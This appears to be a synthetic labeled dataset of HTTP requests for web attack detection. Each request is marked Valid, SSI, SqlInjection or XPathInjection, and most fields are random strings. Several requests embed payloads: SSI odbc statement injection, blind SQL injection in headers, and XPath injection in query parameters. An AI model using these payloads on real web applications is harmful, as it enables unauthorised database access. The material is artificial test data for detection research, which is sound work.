ETag: "FrMLgu@.720fshMCbGBc"
Expect: sOoyeA
From: 1eNTR8ie@q3cs.biz
If-Modified-Since: Sat, 11 Mar 06 12:13:12 GMT
If-Unmodified-Since: Thu, 20 May 04 21:57:28 GMT
If-Match: "v6Iw9joYJy1_98x-q"
If-None-Match: *
If-Range: *
Max-Forwards: 22
MIME-Version: 0.8
Pragma: r1d=a
Proxy-Authorization: rnic hovsi9ai=hhcDiun8
Authorization: Basic anA0czptZW9hRWlp
Range: 272882-6
Referer: /ereodty/dfdl/r8nzmir/gE8hoi/e8onr.mdb
TE: deflate
Trailer: Authorization
User-Agent: 4netbuEj (hghey3mo3; eJrZKgHIw.; e.PJczT)
UA-CPU: x86
UA-Disp: 1777,9655,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 112x1566
Via: iasaue/5.7 www.rnee.jpeg, FTP/6.4 www.Rwsa0sl.jpg
Transfer-Encoding: identity
Upgrade: anin8s/5.0, 42tdtt/2.9, tMob/9.6, 6sg/5.1
Warning: 277 www.e1sshZ.js "imastqftsdu" 
X-Forwarded-For: 7.132.119.46
X-Serial-Number: 570685869927204
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 22398
Start - Id: 11257
class: Valid
GET /ggndtxdm5o/CLdQ5.samk18.s0/2veeisur/imSibxlcom7aep/mB/eoe4/thOr/.DVnodeYVkJ2AVj5/of6do/ssEqtif/leia5.msf?ss6hIlTyiy=6o%2Bntih&4k6teutaeu=e9gror&.g4m=mft38 HTTP/1.1
Host: 76.16.203.139
Connection: ft2ai
Accept: image/jpeg, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eEoy-aiyh, mi0O-vsynieE;q=0.5, mirDi8-z, s-stbuej, sHsgyapa-y4sionvr
Cache-Control: min-fresh=82213
Client-ip: 49.40.111.24
Cookie: M5cZgroup byt9h.fE=>a;YeZcdm4I@E=saft;fersrg=aytdeighePr;d4RC=49wa4aoHqM8o;HNqvqZ_AqYEphp=na;rtetia2e=sTxz_4nVp_
Cookie2: $Version="475"
Date: Wed, 29 Dec 04 24:02:04 UTC
ETag: "r6cFlT69xgKl84H"
Expect: e7exuse9
From: aarli@mLmeltu.be
If-Modified-Since: Wed, 10 Jan 07 03:26:36 UTC
If-Unmodified-Since: Wed, 02 Jan 08 14:03:31 GMT
If-Match: "JQqgoMb332Y6iffww7LP"
If-None-Match: *
If-Range: Tue, 09 Dec 08 11:04:27 UTC
Max-Forwards: 904
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic dE5wcGVlOm9pc3M1Yw==
Authorization: Digest uri=http://eYaez.uk/sgdslzo4/iedthrvG/xusueg/l3ni.cgi
Range: 394051-208299
Referer: http://lasgTN4r.fr/n5sr.rar
TE: trailers,trailers,gzip
Trailer: Pragma
User-Agent: Mozilla/8.4 (X11; U; Open BSD i586 0.7; ni-nt; rv:0.3.0) Gecko/37738862
UA-CPU: PowerPC
UA-Disp: 2659,0505,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 234x2210
Via: 7.6 142.84.149.157, 4.4 243.98.93.95
Transfer-Encoding: compress
Upgrade: ezh/4.9, hQouO/8.3, Ttomi/2.4, iind/9.4, umvntb/3.3
Warning: 582 84.110.116.229 "aokaesAu1ilha" 
X-Forwarded-For: 161.180.94.113
X-Serial-Number: 818941
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 11257
Start - Id: 40941
class: SSI
GET /w-TbIfGhxM.gif?nnodzkni=m7cazH&oo1=hdssidVetamr&d9enrckfifekcjh=67&ig=90795&mhaSofr=rqsr&ttste63a=3o&dNgkN7Q7no=05658&4exgDehunjy=75428875&nefea=%3C%21--+++%23odbc+++++connect%3D%22Goass%2Cnmehn%2Coh2%22++++statement%3D%22select+++*+++from+++++na%22--%3E&thrq1n1ov=an&izr8id=its8at2iteewDM&ino=7433352&na=edmCSBbzxVW&iRdr0lT3tEntu=5tonx6dd%28a&rmepirihaIi=ikUF HTTP/1.0
Host: www.OAFoiiit.ch
Connection: close
Accept: text/xml;q=0.4, image/*, audio/*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: gzip
Accept-Language: lashdXu-trpe;q=0.2
Cache-Control: no-transform
Cookie: nxn=cbnp=Tbodyouyh1ib;szn5t=83403783
Cookie2: $Version="722"
Date: Sat, 13 Aug 05 12:31:50 UTC
From: Taifhs@4loted.uk
If-Unmodified-Since: Thu, 09 Jul 09 24:42:51 UTC
If-Match: *
If-Range: "5mSE5ATSimASSQx3x7"
Max-Forwards: 7724
Authorization: ti5cm Taih6t=ii7te
Range: 4-
Referer: /d8se.asp
TE: deflate,trailers,gzip
User-Agent: Mozilla/6.6 (X11; U; Open BSD i386 7.1; te-ae; rv:0.2.8) Gecko/61484388
UA-Color: color8
UA-Pixels: 877x4813
Via: 4.8 www.rlet.jpg, 9.4 www.ekEo.png
Transfer-Encoding: gzip
----: ----------

null

End - Id: 40941
Start - Id: 30177
class: Valid
GET /jgs.php3?eos1m=sm&rnus4=esdieht&r5uolaihaseDpy=brxmteNxttnem&HeMu=o+%25p&Lez=933&cawlelinirle=0&teuzpmdgtni=88778444&encr1Riti=dBL-0aIsYt&Hcaehblrtas=eaa%40 HTTP/1.1
Host: 171.210.21.110:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: eser-A6, hdsGtp-cslow;q=0.0, rao-n
Cache-Control: only-if-cached
Client-ip: 193.181.58.13
Cookie: faarualH1vdt=shtGbtrrmochaaesstbv;9MMWBtincludeki=ttonnbk
Cookie2: $Version="388"
Date: Tue, 31 Jul 07 03:27:57 GMT
ETag: "8cieUy-vSOpwIbKZ"
Expect: itel=TtAissOv
From: n30oip@sye2lHtos.gov
If-Modified-Since: Tue, 21 Oct 08 16:51:45 UTC
If-Unmodified-Since: Wed, 21 Jun 06 23:33:06 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 10 Jun 05 10:33:52 CET
Max-Forwards: 1071
MIME-Version: 5.5
Pragma: k='c0cd'
Proxy-Authorization: aGeo uhioari5=RFiho
Authorization: Digest uri=/talkrqo/el6ieneo/iosN/dsEodq/nMddllv.tar
Range: -5461,-03305,-419
Referer: http://www.Olhghwn.de/mhh9tDhg/rhtz.avi
TE: chunked;q=0.9,trailers
Trailer: Upgrade
User-Agent: vteg8yeo (eviK321; rzoftM6p; h_WqT8a_W8)
UA-CPU: Sparc
UA-Disp: 133,828,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 488x0113
Via: 7.6 www.sagrS.png, 8.9 www.R5icA.jpeg
Transfer-Encoding: xCnei
Upgrade: delna/9.9, tta/9.0
Warning: 337 145.226.205.116 "slrtoretepnre" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 5387143927109477044
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30177
Start - Id: 31349
class: Valid
GET /um22TOSWu0nGHNQz/icGMmYiJALRTaFp/dR/ugs/anhAayiepeYeede85Ss3/gOd8i8w@/tbHeJMPiKvDTf/3gO_9mEJp/tnvmob/lstcrosn/bodyIZ/l_2ik.shtml?scyALriuna=oecla3ne&gr=E4&OEo1erhlEDaeHee=ibetweeni&0dMobject2vBVo9S=823328&ONJNroxgbinG=5310900&trtnc6=seeptj2ahh7metalxp_+&passthru%u.7DV3=bf.IOfE9&dtress8zlmauh9n=2189&sexr73jsapLtsso=NdAeiclsmohlahe6vw HTTP/1.0
Host: www.eliea.gov:80
Connection: close
Accept: application/*;q=0.1
Accept-Charset: windows-1251;q=0.6
Accept-Encoding: identity, compress, gzip, deflate
Accept-Language: 8afI-rx9Sren;q=0.4, 63alrbe-EeT5aee, at4tb-bseeAnah;q=0.1
Cache-Control: max-stale
Client-ip: 243.156.176.3
Cookie: nheseen1hsNeey=inqnlruDeieirol;tyiqto7hwrohha=4505;escyoONrxf5=daamns2tcn0o1ha
Cookie2: $Version="507"
Date: Sun, 03 Jun 07 13:11:45 UTC
ETag: W/"7RAIcfEv1VIm@SIHj"
Expect: 100-continue
From: 6gpr@stnznr.com
If-Modified-Since: Sun, 21 May 06 04:45:45 CET
If-Unmodified-Since: Fri, 05 Sep 08 08:59:47 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 14 Oct 07 09:02:35 CET
Max-Forwards: 6
MIME-Version: 5.1
Pragma: mpoee='ettE'
Proxy-Authorization: taoeyH n4or=btrc76
Authorization: Digest response="f7D98a2A712a6aCdCa97296Eaafe949B"
Range: 8-,2512-,696-3957
Referer: http://atuss9r.st/l2raneci.php4
TE: chunked,deflate;q=0.4
Trailer: TE
User-Agent: Mozilla/0.0 (Machintosh; U; PPC Mac OS X 9.7; li-o0; rv:4.5.8) Gecko/66687855
UA-CPU: x86
UA-Disp: 112,516,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 562x0900
Via: bh4ic/1.5 144.201.79.199
Transfer-Encoding: D3eprL; SWturi=ayur
Upgrade: lil/6.2
Warning: 013 www.desun.jpg "AikotD" "Sun, 12 Nov 06 05:18:44 UTC"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 5665287
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31349
Start - Id: 918
class: Valid
GET /eiznosysscoo/knOcybhnIJYG4UBdaPX/hsYsIbRD4EscaDV_9X/ehdf/ixc@do7r/Zc40aUvmVInb/tarrupaTEn/birlf0vF@.jpeg?Wao=Sst HTTP/1.1
Host: 164.198.104.172
Connection: close
Accept: text/plain;q=0.8, text/xml;q=0.8, image/*;q=0.7
Accept-Charset: *
Accept-Encoding: deflate, deflate
Accept-Language: mrbgomw-lates, ie-7aliwg;q=0.1
Cache-Control: no-cache
Client-ip: 54.128.13.195
Cookie: ssEftoa1sf1ax=lochttpeJ7 9scripte0ycopyl>dmibody;Ieoxomoefne4hn=ie;eRnieemeygni1r=hhtanvhnir;gyShguTihae=o@f;mexjelehshdroe=7;4vl6es.51I=?iicle
Cookie2: $Version="9"
Date: Tue, 06 Jan 04 09:09:00 GMT
ETag: "Wnr_CJee-vPR_qHdb"
Expect: etpt=Z3mqa;7euitmee=etfinn
From: 3sntq@jnenrb.uk
If-Modified-Since: Sat, 24 May 08 12:05:21 GMT
If-Unmodified-Since: Wed, 02 Sep 09 01:16:55 GMT
If-Match: *
If-None-Match: "blIMl5j79WJQJKsNP"
If-Range: *
Max-Forwards: 4456
MIME-Version: 3.0
Pragma: bnaoengs=z
Proxy-Authorization: NTLM b2FuczVhaHBsbno1RXJldWV0NXd0UnJzaWJ1cGtvZW5kb21TZWFFVHNzVA==
Authorization: aAte dejeoat=EtaN
Range: 37-165,99813-448132
Referer: /ispnhle/cshhs3/soad/mtskn/haiwYt.css
TE: chunked;q=0.9,deflate;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/0.7 (Windows; U; Win 9x 2.7; iz-mn; rv:1.6.1) Gecko/21127968
UA-CPU: PowerPC
UA-Disp: 1003,145,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1573x8135
Via: 6.6 www.gruSfyAf.jpeg:5, 3.9 www.sjhajt.js
Transfer-Encoding: compress
Upgrade: iehx1/0.3, ohanrn/8.7, 0ph/6.5, RaOe/2.8
Warning: 028 90.73.184.74:3067 "pe3oiolmIthbRveDesnt" 
X-Forwarded-For: 21.215.62.37
X-Serial-Number: 510626783025324042
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 918
Start - Id: 29770
class: Valid
GET /ix/y0u4d9munweCsmkPen/AuQ6locationvpH/hq_Vxz2Fc3h/shzHoyRo/zj/fmt1nxPz/dYPo@/XJ3_kg/teee3adruh0mndhsimB.gif?7scbso=1&bfeIo93=agh6uorCbodyinclude8s%7Eusr6lsystemusrn&ongOie1ehs98ehh=1909186563&yRerohg=a&fnpactuetstlh=06&httite=wwkJV%40NkULxZ&a8utyi=tthieo04Ih&bwt2eawrbx=sT9gc&Aesohchdsb=637360&iaRhelpenin8fE=66&ogses=%24F%5C HTTP/1.1
Host: 205.148.176.158:1
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: d='eet'
Client-ip: 10.93.129.15
Cookie: ddtwd=i
Cookie2: $Version="690"
Date: Wed, 05 Aug 09 15:59:57 CET
ETag: "VBKG2Z0RIf0MTTl"
Expect: 8ainhtfs
From: apnm@hnhwooJMi.gov
If-Modified-Since: Sat, 20 Sep 08 10:27:49 GMT
If-Unmodified-Since: Sun, 23 Jul 06 13:14:03 GMT
If-Match: "XomgH1jG_XRnhYc1e_"
If-None-Match: *
If-Range: Fri, 16 Jan 09 02:02:18 GMT
Max-Forwards: 8
MIME-Version: 8.1
Pragma: Ttatti=20w
Proxy-Authorization: Ugaojh ovcg=gigisa
Authorization: Basic ZXRNb046cm9FY3B6dVo=
Range: -02795
Referer: http://hyousgt.com/rmyoa.swf
TE: gzip;q=0.1,trailers
Trailer: Referer
User-Agent: Mozilla/7.2 (Windows; U; WinNT 4.2; zw-rh; rv:9.2.0) Gecko/64771643
UA-CPU: Sparc
UA-Disp: 045,174,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2347x796
Via: 5.3 53.199.144.49:897, ln4/1.7 178.67.33.52, FTP/1.2 www.anareres.htm:169
Transfer-Encoding: identity
Upgrade: ireass/1.2, atID/3.9, EkugeU/4.8
Warning: 299 www.1d0a.js:3 "oeah" "Wed, 09 Jun 04 20:27:53 GMT"
X-Forwarded-For: 150.107.9.100
X-Serial-Number: 60598731364940051036
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29770
Start - Id: 41228
class: SqlInjection
GET /vrY5ysNRF/ztsnwndtees/Oaetyodsem0ado/gtodrnleLds/.C6r69LbgsoundEL6.asmx?3oc=gieceaoronOcb&orusr67.n2e9=896&qr=%26r&h_osj6h=9Uohe3xTTlElvb6spi&2gLtt8toIbimIbe=erawistppMtnmzeiMd&s4oadts=b%3Eohtmnneftpan&ryh0_Gmailj4=%7Eoot5noe&aHh=y&eeaeeS3gnl8=9175&vhac=sKnXZ&ntelJdS=ui+s+eexecbdmife+nnt%29%3C&n6=hLfJTUY.w1gP&aate6j=o3%40Hl6 HTTP/1.1
Host: 126.228.88.212
Connection: keep-alive
Accept: application/*, text/html;q=0.4, audio/*;q=0.5
Accept-Charset: windows-1257, windows-1255, windows-1252
Accept-Encoding: gzip;q=0.4, compress, compress;q=0.6
Accept-Language: AND    ascii(lower(substring((SELECT  TOP     1  bbgueo  FROM sysobject   WHERE     xtype   =    'U'),1,1))) >  111
Cache-Control: max-age=6
Client-ip: 206.238.177.255
Cookie: lfu63Aemrchdy=rheT/;vbscriptU-EoNZ=ra;ntlslRHat=ceLateae0dudiv;e1tbio=1ci1hNdyre;gwyairTgEd6a=17;ioahgcN=320852
Cookie2: $Version="15"
Date: Sat, 22 Sep 07 07:49:07 GMT
ETag: W/"5ZTrgczviWtaDg7uhH"
Expect: 100-continue
From: hsk6aaig@oo1it1ta.gov
If-Modified-Since: Mon, 10 Dec 07 18:48:41 GMT
If-Unmodified-Since: Sat, 07 Apr 07 21:45:58 GMT
If-Match: "LVwtOtk52KkbaPTLdU.u"
If-None-Match: "Bk_U@UYgE_CTDK.u3S"
If-Range: Tue, 28 Aug 07 12:57:56 UTC
Max-Forwards: 07
Pragma: ocst81en='tbnPE'
Proxy-Authorization: Basic aGEwa2hyNDpvZWN0
Authorization: NTLM NHB1dW5lYWliZXJwdXRzcmVOVnNvaWJubnNkdG9vdTk=
Referer: http://www.wtIO.ch/dbrgn.asmx
TE: deflate,deflate;q=0.1
Trailer: Pragma
User-Agent: OR  257=257
UA-CPU: 68000
UA-Disp: 940,2353,32
UA-Color: color16
UA-Pixels: 598x7537
Via: 3.6 82.99.39.106
Transfer-Encoding: deflate
Upgrade: WmdnaR/6.5, nsor/8.1, 4151p/2.5, 0uhl6/4.4, 2wnsz/5.7
X-Forwarded-For: 123.241.252.226
X-Serial-Number: 480673046324930914
----: -----------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41228
Start - Id: 28336
class: Valid
GET /fVCZ2qco./uA6HN@NL/hub/RLY81MT/dgtezdb4cclr/sLaisT@iJ_03JaJ/6HePstyle4TR/bi5FmRl/e8pwDwH/Lfcclehrposa8fgaem/AioiOAn2/nxZPcU.x_yWBcZsc.php?oublBi4uqe=5dr2tthfromnUese&wz6pAincludev-b8xml=hFmPpG7g2m&fhe1=dnrTnmyedo0d&txsjennVte=rmrAan5rdirai%26winnthome%28nkBo&tnnqr=afoaEdto+djhe&nieone=fz2+ohqkro9&ns=7teTn8%2Frao&Aycleoubiwi120h=sl1ig2latb&wyggqQlinkLd=jtnetladQ&aynemoel=d9ssqsusro%28&taAesroat=oGld&tsaCynsneaE=f&6E-_JV=si%3Famailra058ll&cmdsFCoWJ=nFoNboahehIt HTTP/1.0
Host: 156.90.102.142
Connection: close
Accept: application/zip;q=0.4, application/zip;q=0.5
Accept-Charset: iso-8859-1, windows-1255, iso-8859-5;q=0.9, cp-950, ks_c_5601-1987
Accept-Encoding: deflate, identity;q=0.6
Accept-Language: sT-cmatdG, D-sfee;q=0.1, toiltioi-otoa7, peiys-yera;q=0.3
Cache-Control: max-stale=95021
Client-ip: 144.127.150.225
Cookie: rqtbr=l netcatiytd%aatnunion;l3hc=2;luXihyK=9Ezls1T;n4LodsSo=172813
Cookie2: $Version="1"
Date: Mon, 05 Jun 06 17:22:03 CET
ETag: W/"mfRHSAnTHE94RQ5"
Expect: mfsmf
From: uo4ee7@tp9n.net
If-Modified-Since: Sat, 22 Oct 05 01:10:12 GMT
If-Unmodified-Since: Mon, 04 Aug 08 23:59:55 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 13 Nov 08 18:44:05 UTC
Max-Forwards: 3201
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="pniifin"
Authorization: Digest nonce
Range: -665,-24
Referer: /ulr2.jpeg
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: 8m1Ftxa http://www.Urchet.st
UA-CPU: StrongARM
UA-Disp: 853,814,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 467x5398
Via: uaiee/5.3 147.29.128.19, 9.5 250.225.9.170, HTTP/8.6 www.tees.css
Transfer-Encoding: gzip
Upgrade: mNe/8.8, ehIbla/4.3, s6oaa/4.9, cih/1.0
Warning: 212 44.77.164.82:9411 "oseeleemmt3mdltO" 
X-Forwarded-For: 4.223.135.197
X-Serial-Number: 4245119888
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28336
Start - Id: 34641
class: Valid
POST /tTbEdy0L/aSmTWhomeopen/eleoEdehisresyty/gcH@nIcvR5vBxGY8.jsp? HTTP/1.0
Content-Length: 63
Content-Language: bEMshtr5,nShdoisg,ffejedr
Content-Encoding: identity
Content-Location: http://oos1.com/ndbt/hcwrh/cMnu/aiugts.asmx
Content-MD5: YWlkaUloaDhjbHV0QXJtYg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 Feb 05 06:09:24 CET
Last-Modified: Sun, 12 Jul 09 12:09:12 GMT
Host: www.0vTpcewt.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 67.93.72.22
Cookie: idNk=lNe;n3axxntOns=@Rdalkd<xrro;ceYay=mabN lnIwhere
Cookie2: $Version="94"
Date: Sat, 17 Sep 05 17:47:55 GMT
ETag: W/"U4tFtReVabM2glQ"
Expect: 100-continue
From: n4Wig7Rx@ieiopg8y.it
If-Modified-Since: Wed, 08 Jun 05 09:25:51 CET
If-Unmodified-Since: Fri, 02 May 08 05:10:03 CET
If-Match: *
If-None-Match: *
If-Range: "1NNvjpxSHlqz6V0gVE@P"
Max-Forwards: 826
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic ZWFicElhTDo3aW9ubQ==
Authorization: Basic ZWVUYWU6bGFuRmFvYg==
Range: -2054
Referer: http://lzereeh.cz/eewYaye/syln.jpeg
TE: deflate,chunked,trailers
Trailer: TE
User-Agent: ayrnmsal (iYRaYQ4BfJ)
UA-CPU: PowerPC
UA-Disp: 379,2037,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3397x406
Via: 1.1 www.neeh7e.html
Transfer-Encoding: gzip
Upgrade: 0lmc/3.2
Warning: 527 76.238.80.61 "hris94" 
X-Forwarded-For: 139.243.218.142
X-Serial-Number: 09613
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

J7@f.psr-QrYR=2423312&1TsYk_8wUaccept=2&ns=a9tTWGtHY&2xTf3oy=03

End - Id: 34641
Start - Id: 32661
class: Valid
PUT /GYFv6s/qeIeoxnro9/txxmH/beonstmdaaon/nbeipshasuteshhhwx/aEKw/UCU4g/t1rs8/aDRab@oEcmeuv_ZYUj93/rc-wTmRZVl3yD/ayxzaR/txraiaOsenaslrfsNe.mdb? HTTP/1.0
Content-Length: 243
Content-Language: fb
Content-Encoding: identity
Content-Location: /qieof.asp
Content-MD5: NGVhbGVudGRlZWRhaTRpdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 23 Jan 10 04:52:21 UTC
Last-Modified: Sun, 10 Apr 05 01:50:53 CET
Host: www.ne0mn.uk:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6;q=0.8, x-mac-japanese, x-mac-japanese
Accept-Encoding: *;q=0.9
Accept-Language: laejac-n6l;q=0.8, fo-surHsx, 9peeoHos-a;q=0.0, i-u;q=0.0, PrU5d-pd
Cache-Control: no-store
Client-ip: 164.66.145.18
Cookie: vBB6ipe=tKGPVR9ua;umutmnaegnorrca=8;is=w2WsmTt;MOe6ruetLm=5;62lfXD=systemm
Cookie2: $Version="661"
Date: Sat, 07 Jun 08 02:00:28 GMT
ETag: W/"DRV@0Eo9shYkSmJnzwc0"
Expect: tseoEsms=st7mnws
From: t8whu@dszw.biz
If-Modified-Since: Sun, 06 Apr 08 16:49:55 UTC
If-Unmodified-Since: Fri, 01 Oct 04 14:41:59 CET
If-Match: *
If-None-Match: "tfzqHD3VBxWDPxGPXR_"
If-Range: Mon, 02 Aug 04 09:44:24 CET
Max-Forwards: 0322
MIME-Version: 8.8
Pragma: Y='aeheHci2'
Proxy-Authorization: nsaea Rbis=Iad6tiRh
Authorization: nees iaoa=rmasH5
Range: 5-,-81662,01479-
Referer: /jvar/eAhosbie/7ilp/AcsFlqic/hshz0e.pl
TE: gzip,trailers
Trailer: Warning
User-Agent: Mozilla/7.4 (compatible; Konqueror/0.6; Mac OS X; 9teisrefh)
UA-CPU: PowerPC
UA-Disp: 530,9577,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 853x924
Via: HTTP/5.4 www.TebQsxd.png, 3.1 132.240.230.52
Transfer-Encoding: gzip
Upgrade: bes/5.0
Warning: 732 66.142.105.251 "rwaRrsaIalqta" "Sun, 12 Jul 09 20:33:14 CET"
X-Forwarded-For: 52.89.151.232
X-Serial-Number: 108492
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mHrc6hxTigna4u=yMcpositionu1AneiihS&eUuiu=062127&7poo=~&t9stofhrsfo9=/;t;5:de&il6kyeeR=tlt&iMePemmdnt=sNf9&wexonmelUknwz=tPn39sypFMd&Iz5knZSt-echob=DrEa3haEaiki&7ea=ceu8nluaaf&uSnS=fX@z&WtEU32yI4W=ftnp>YhewI+r ia&5lt479=3pZ6Bqc

End - Id: 32661
Start - Id: 48739
class: XPathInjection
GET /b7Bn7jUXCe/5ZySf@o/TacgaeERnmiwbelZ/3SlUW3Q/iutjtu.bin?7tv=a6IZ8G.%40y4&Q4WwMd2=443567&sSDO=nitoae%2Fhj%2Fidng3%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D45%5D+++++%7C+++hmh%2Fr5yeFi%2FOc%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D2%5D+or+++%27o7%27++%3D+++%27&eOrxces480t=xdnarwniypsarw&edekgn3phi=rA%40&nl5b9tasaeuhe6=hl&on2nith9fn=tnbrmocha HTTP/1.1
Host: 125.255.224.242:80
Connection: close
Accept: image/jpeg;q=0.8
Accept-Charset: big5;q=0.9, utf-7, iso-8859-15, euc-tw;q=0.6
Accept-Encoding: compress, gzip;q=0.5, gzip;q=0.9, compress;q=0.0, gzip;q=0.4
Accept-Language: caI7-tanusdi;q=0.4
Cache-Control: max-stale
Client-ip: 80.135.128.144
Cookie: atHhdoUme=Teieeamind;SorM=i;oe3otI9nMwi=105;58IGPxD5MsU=sbo;hmNslm=marr3he;rajtlsaosntaiAe=rE z
Cookie2: $Version="20"
Date: Sat, 21 Feb 04 01:53:44 GMT
ETag: "ZK6rRiESD.1Gb_ywFsgj"
Expect: fonrex
From: wdlEt@aLnyEae.st
If-Modified-Since: Wed, 19 May 04 16:29:22 CET
If-Unmodified-Since: Sun, 24 Jun 07 08:41:37 GMT
If-Match: "HdK9ogfy1hEEZ4th3U"
If-None-Match: *
If-Range: Wed, 03 Mar 10 21:40:47 UTC
Max-Forwards: 9
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic aTRhbmVjdWE6NHVkcnBJZQ==
Authorization: gor2s o1eaad=HmK3
Range: 328-,-79624
Referer: http://www.ltalhf.it/toCjabta/ukXhoo/toihoes/bzh6.jpg
TE: deflate,gzip;q=0.2
Trailer: Upgrade
User-Agent: Mozilla/4.3 (Machintosh; U; PPC 9.9; 3k-mp; rv:8.5.9) Gecko/67380052
UA-CPU: Sparc
UA-Disp: 383,7036,16
UA-OS: Windows 98
UA-Pixels: 9907x836
Via: ekt/4.2 76.250.150.25, 6.2 227.235.252.211, celnf/2.0 163.145.61.193:410
Transfer-Encoding: gzip
Upgrade: ls4i/9.1, snhjn/6.4, en4a/1.2, dbennt/8.6
Warning: 669 www.nfgu.shtml "3kai" 
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 3865979
----: ------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48739
Start - Id: 35803
class: XPathInjection
GET /sMPrS8negGe/ogereete8eeAcunuse/j5os6EHe57hnzhebbno/aiuzhquct0etnn.htm?ogatfq82neToOse=lYen+l+&dum3aec=E%27isboot.ini&flofcn=Miu%2Far%2Fee%2Fchild%3A%3Anode%28%29%5B++++position%28%29%3D759%5D+%7C+zoee%2F4%2FcnSTmu%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D376%5D++or+++++%2733Cioroh%27++%3D++%27&uraio=retv&aBxaiu=cx&dwiaeoqshpFo=u9ahhtmp&8yaH09H=pdsren&lxrljsdict2i=Aw&anoqnd6ih=lGbK6CLzO&5d7Fsrm=hTypaM4CPpO HTTP/1.0
Host: 126.246.57.15
Connection: keep-alive
Accept: video/*;q=0.6, text/xml, video/*;q=0.5
Accept-Charset: x-mac-roman, macintosh;q=0.0, utf-7;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 148.57.16.185
Cookie: Kx5qtelnetHGD=dnte
Cookie2: $Version="52"
Date: Wed, 16 Sep 09 19:01:55 GMT
ETag: W/".LkKw7IuwRwvfgL-"
Expect: dot8tk1a
From: gH0ez@Sireoah.fr
If-Modified-Since: Wed, 19 Jul 06 22:51:41 CET
If-Unmodified-Since: Sun, 03 Jun 07 08:15:19 CET
If-Match: "4EO6.FEb_9HD51M1cGO"
If-None-Match: *
If-Range: Mon, 12 Jul 04 15:59:58 GMT
Max-Forwards: 7375
MIME-Version: 9.7
Pragma: u=hEWNAeo
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest opaque="rt7ngt"
Range: 205-0247
Referer: /htt3cwbd/ebsmia/amtne/enhwTh/ctb1ow.bin
TE: chunked,deflate,trailers
Trailer: Expect
User-Agent: Mozilla/4.4 (compatible; MSIE 2.6; Win 9x; mewI)
UA-CPU: x86
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: 0.7 97.3.176.16
Transfer-Encoding: identity
Upgrade: hljiT/5.4, axrst/8.8
Warning: 463 52.135.104.34 "le3vso" 
X-Forwarded-For: 240.46.36.222
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35803
Start - Id: 9420
class: Valid
GET /se4SVA_zeK/nvx-vEpeut-uO/daysooneb/nlwdr4yne9s1Aot/sTXCkF/4z@GnBEs79DL06WsQ3Sm/helrhtbnenht/aUaxyascelObk/jpX.irr-nVRqOz.jpg?triasrdem4ooss=oiu+m&MATn0sFI3=p&ahh=aa+maAOmetafSm&8CNwI4u=feh&TREEchildautoexecdqall0=nEropsnuTEssSwba&zm8iiodhsswnr=iwzARO%40&boi=eEJtb&pnull29NP8Y=ecstienuaed%3Bt&eE2ue=iEKYOSlMAQZ6&eeltYtlh0t=g++e%3Fe+n&to8=8&wpdcwsves=da2yosst4chhvpopm HTTP/1.0
Host: 167.77.75.193
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-2022-kr;q=0.8, euc-kr;q=0.3, iso-8859-2, x-mac-roman;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 190.80.78.33
Cookie: script._u=nF6traHohnjilp;dreahtLAgo=enrlx>icu
Cookie2: $Version="956"
Date: Thu, 20 Jan 05 17:58:03 CET
